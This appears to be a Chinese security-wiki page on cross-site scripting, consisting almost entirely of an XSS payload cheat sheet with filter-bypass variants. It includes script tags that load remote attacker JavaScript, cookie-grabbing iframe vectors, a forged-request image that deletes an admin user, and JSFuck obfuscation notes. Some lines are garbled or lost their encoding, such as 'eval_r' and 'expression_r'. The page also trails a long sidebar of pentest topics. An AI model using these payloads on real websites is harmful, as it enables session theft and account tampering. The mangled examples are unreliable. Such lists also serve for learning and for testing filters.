👻
security
  • 计算机技术
  • OWASP TOP 10
  • 名词解释
  • 1
    • 常见端口利用
    • F5 big-ip从环境搭建到漏洞复现
    • 红队资源
  • About
    • APT
      • 海莲花(APT-C-00)
        • 样本分析
      • 毒云藤(APT-C-01)
        • 大规模钓鱼攻击活动披露
        • 2020上半年针对我重要机构定向攻击活动揭秘
      • 响尾蛇(T-APT-04)
        • 利用WebSocket隧道的新型攻击活动披露
      • 蔓灵花(APT-C-08)
        • 移动平台攻击活动揭露
      • 蓝宝菇(APT-C-12)
        • 组织使用云存储技术发起的最新攻击活动披露
      • 双尾蝎组织(APT-C-23)
        • 针对中东地区的最新攻击活动
      • Lazarus(APT-C-26)
        • 暴风行动 -利用MATA框架针对数字货币行业的攻击活动揭秘
      • Fancy Bear(APT-C-28)
        • 携小众压缩包诱饵对北约、中亚目标的定向攻击分析
      • 肚脑虫组织(APT-C-35)
        • 使用升级版数字武器针对周边地区的攻击活动
        • 针对巴基斯坦的攻击活动
      • 拍拍熊(APT-C-37)
      • 军刀狮(APT-C-38)
      • 蓝色魔眼(APT-C-41)
        • 组织首次针对我国重要机构定向攻击活动披露
      • 美人鱼(Infy)
        • 使用最新的Foudre后门进行攻击活动的分析
    • 各类靶场讲解
      • sqli-labs
      • upload-labs
      • xss-labs
    • CISP题库
    • Docker
      • Docker基线
        • docker基线-概述
        • 推荐一
        • 推荐二
        • 推荐三
        • 推荐四
        • 推荐五
        • 推荐六
      • 命令与选项
      • 基于Docker的固件模拟
      • 固件相关
      • Docker 私有仓库搭建
      • 基础命令的背后
      • 渗透思路调研
      • Docker容器环境检测方法【代码】
    • 浏览器
    • markdown
    • 密码学
    • 内网渗透TIPS
    • 网络扫描
    • 正则表达式
  • 操作系统
    • Android
      • APK终端安全分析法
      • 应用审计指南
        • 通用审计方法
    • IOS
      • 应用审计指南
    • Linux
      • 反弹shell
      • 基线检查
      • SHELL编程
      • 实战技能
    • windows
      • BACKDOOR with 权限维持
      • 磁盘取证实验
      • 基线检查
      • 免杀抓取明文
      • payload下载方式
      • powershell
      • 日志分析
        • 分析工具
      • Untitled
  • 数据库
    • db2
    • mysql
      • webshell写入
      • 基础知识
      • 核心技术
      • 高级应用
    • oracle
      • webshell写入
    • SQLserver
      • webshell写入
  • 中间件
    • apache
      • 基线检查
      • 日志审计
    • iis
      • 基线检查
      • 7.5解析绕过漏洞
    • nginx
      • 基线检查
    • tomcat
      • 基线检查
  • 编程语言
    • C
    • Java
      • webshell
        • 查杀Java web filter型内存马
        • Filter/Servlet型内存马的扫描抓捕与查杀
        • 基于内存 Webshell 的无文件攻击技术研究
        • 基于tomcat的内存 Webshell 无文件攻击技术
        • Tomcat 内存马检测
      • 代码审计
      • 代码审计指南
      • 浅析Java命令执行
      • 相关框架简介及漏洞
    • PHP
      • 代码审计
      • 破解DVWA-admin密码
      • webshell
        • 常见php一句话webshell解析
        • PHP Webshell Hidden Learning
        • Webshell免杀研究
        • Webshell那些事-攻击篇
        • 过D盾webshell分享
      • 相关框架简介及漏洞
    • python
      • 安全编码规范-代码审计
      • 编码规范
      • fishc
      • 某教程涉及脚本
      • POC编写相关
      • python秘籍
        • 上半部分
        • 下半部分
      • 安全方面的内容
        • Python Opcode逃逸笔记
        • 虚拟机逃逸
      • with-EXCEL
      • 相关框架简介及漏洞
      • 源码剖析
        • 多线程和GIL锁
        • Set容器
        • 统一内存管理
        • 信号处理机制
        • 循环垃圾回收器
        • 字符串对象PyStringObject
        • 整数对象PyIntObject
        • 字节码和虚拟机
    • 汇编
    • Javascript
      • Tampermonkey Script
  • AIGC
    • howtouse
  • 网络
    • CCNA
  • 漏洞类型及讲解
    • 综合
    • 技术分享
      • 暴力破解与信息泄露
      • 信息泄露漏洞_java
      • sqli-with-java
      • python远程命令执行与SSRF
    • SQL-Injectoin
    • Cross-Site Scripting
      • 跨站的艺术-XSS入门与介绍
      • 跨站的艺术-XSS Fuzzing 的技巧
      • 给开发者的终极XSS防护备忘录
      • AngularJS特性的 XSS
    • 文件操作
      • 文件包含
  • how-to-use
    • Acunetix(AWVS)
      • 安装到使用
      • 编写AWVS脚本探测web services
      • 简单分析-web方面
      • 流量分析特征
    • burpsuite
      • 导出报告方式
      • captcha-killer
      • FAKE-IP
      • JSFind
      • 编写插件绕过WAF
    • Cobalt Strike
      • Cobalt Strike Powershell过360+Defender上线
    • FOFA
    • GDB
    • PowerSh
      • 获得Powershell命令的历史记录
      • 深入分析PowerShell的两面性
      • 内网渗透利器之PowerSploit
      • PoC:滥用PowerShell Core
      • 如何绕过PowerShell访问限制并实现PowerShell代码执行
      • 工具包
      • 无powershell运行powershell方法总结
    • sheji
    • sqlmap
      • Atlas修改SQLMap tampers 绕过WAF/IDS/IPS
      • 内核分析
      • 检测剖析
      • tamper
      • UDF
      • --os-shell
      • sqlmapapi
      • with burp
      • 网络特征
    • Matlab
    • Metasploit
      • 与Powershell
    • NESSUS
      • 流量分析特征
      • Untitled
    • Network MapTools
      • 流量特征修改
      • 识别主机指纹
    • waf
      • ngx-lua-waf
      • modsecurity
由 GitBook 提供支持
在本页
  • 1、常见XSS
  • 2、特殊XSS
  • 1.Jsfuck
  • 2.Aaencode

这有帮助吗?

  1. 漏洞类型及讲解

Cross-Site Scripting

1、常见XSS

·普通的XSS JavaScript注入:
<SCRIPT SRC=http://xi.baidu.com/XSS/xss.js></SCRIPT>

·IMG标签XSS使用JavaScript命令:
<SCRIPT SRC=http://xi.baidu.com/XSS/xss.js></SCRIPT>

·IMG标签无分号无引号:
<IMG SRC=javascript:alert('XSS')>

·IMG标签大小写不敏感:
<IMG SRC=JaVaScRiPt:alert('XSS')>

·HTML编码(必须有分号):
<IMG SRC=javascript:alert("XSS")>

·修正缺陷IMG标签:
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

·formCharCode标签(计算器):
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

·十六进制编码:
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>

·嵌入式标签,将JavaScript分开:
<IMG SRC="jav ascript:alert('XSS');">

·嵌入式编码标签,将JavaScript分开:
<IMG SRC="jav ascript:alert('XSS');">

·嵌入式换行符:
<IMG SRC="jav ascript:alert('XSS');">

·嵌入式回车:
<IMG SRC="jav ascript:alert('XSS');">

·嵌入式多行注入JavaScript,这是XSS极端的例子:
<IMG SRC="javascript:alert('XSS')">

·解决限制字符(要求同页面):
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>

·Spaces和meta前的IMG标签:
<IMG SRC=" javascript:alert('XSS');">

·Non-alpha-non-digit XSS:
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

·Non-alpha-non-digit XSS to 2:
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

·Non-alpha-non-digit XSS to 3:
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

·双开括号:
<<SCRIPT>alert("XSS");//<</SCRIPT>

·无结束脚本标记(仅火狐等浏览器):
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

·无结束脚本标记2:
<SCRIPT SRC=//3w.org/XSS/xss.js>

·半开的HTML/JavaScript XSS:
<IMG SRC="javascript:alert('XSS')"

·双开角括号:
<iframe src=http://3w.org/XSS.html <

·换码过滤的JavaScript:
\";alert('XSS');//

·结束Title标签:
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

·Input Image:
<INPUT SRC="javascript:alert('XSS');">

·BODY Image:
<BODY BACKGROUND="javascript:alert('XSS')">

·BODY标签:
<BODY('XSS')>

·IMG Dynsrc:
<IMG DYNSRC="javascript:alert('XSS')">

·IMG Lowsrc:
<IMG LOWSRC="javascript:alert('XSS')">

·BGSOUND:
<BGSOUND SRC="javascript:alert('XSS');">

·STYLE sheet:
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

·远程样式表:
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

·List-style-image(列表式):
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

·IMG VBscript:
<IMG SRC='vbscript:msgbox("XSS")'></STYLE><UL><LI>XSS

·META链接url:
<META HTTP-EQUIV="refresh" CONTENT="0;URL=http://;URL=javascript:alert('XSS');">

·Iframe:
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

·Frame:
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
https://www.t00ls.net/viewthread.php?action=printable&tid=15267 3/6

·Table:
<TABLE BACKGROUND="javascript:alert('XSS')">

·TD:
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

·DIV background-image:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

·DIV expression:
<DIV STYLE="width: expression_r(alert('XSS'));">

·STYLE属性分拆表达:
<IMG STYLE="xss:expression_r(alert('XSS'))">

·匿名STYLE(组成:开角号和一个字母开头):
<XSS STYLE="xss:expression_r(alert('XSS'))">

·STYLE background-image:
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

·STYLE background:
<STYLE><STYLE>
type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

·使用BASE标签:
<BASE HREF="javascript:alert('XSS');//">

·IMG嵌入式命令,可执行任意命令:
<IMG SRC="http://www.XXX.com/a.php?a=b">

·IMG嵌入式命令(a.jpg在同服务器):
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

·绕符号过滤:
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

·URL绕行:
<A HREF="http://127.0.0.1/">XSS</A>

·URL编码:
<A HREF="http://3w.org">XSS</A>

·IP十进制:
<A HREF="http://3232235521″>XSS</A>

·IP十六进制:
<A HREF="http://0xc0.0xa8.0×00.0×01″>XSS</A>

·IP八进制:
<A HREF="http://0300.0250.0000.0001″>XSS</A>

·混合编码:
<A HREF="htt p://66.000146.0×7.147/"">XSS</A>

·节省[http:]:
<A HREF="//www.google.com/">XSS</A>

·节省[www]:
<A HREF="http://google.com/">XSS</A>

·JavaScript链接:
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
常见XSS攻击载荷:
<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))">
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"><INPUT TYPE="BUTTON" action="alert('XSS')"/>"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123
</h1>"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></
IFRAME>123</h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME
>"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></
IFRAME>123</h1>

2、特殊XSS

1.Jsfuck

Jsfuck可以针对常见的js函数、语法进行编码转换: 

False       =>  ![]
True        =>  !![
]Undefined    =>  [][[]]
Nan         =>  +[![]]
0           =>  +[]
1           =>  +!+[]
2           =>  !+[]+!+[]
10          =>  [+!+[]]+[+[]]
Array       =>  []
Number      =>  +[]
String      =>  []+[]
Boolean     =>  ![]
Function    =>  []["filter"]
Eval        =>  []["filter"]["constructor"]( code )()
Window      =>  []["filter"]["constructor"]("return this")()

2.Aaencode

js加密工具aaencode把js转为文字表情符号。

上一页SQL-Injectoin下一页跨站的艺术-XSS入门与介绍

最后更新于1个月前

这有帮助吗?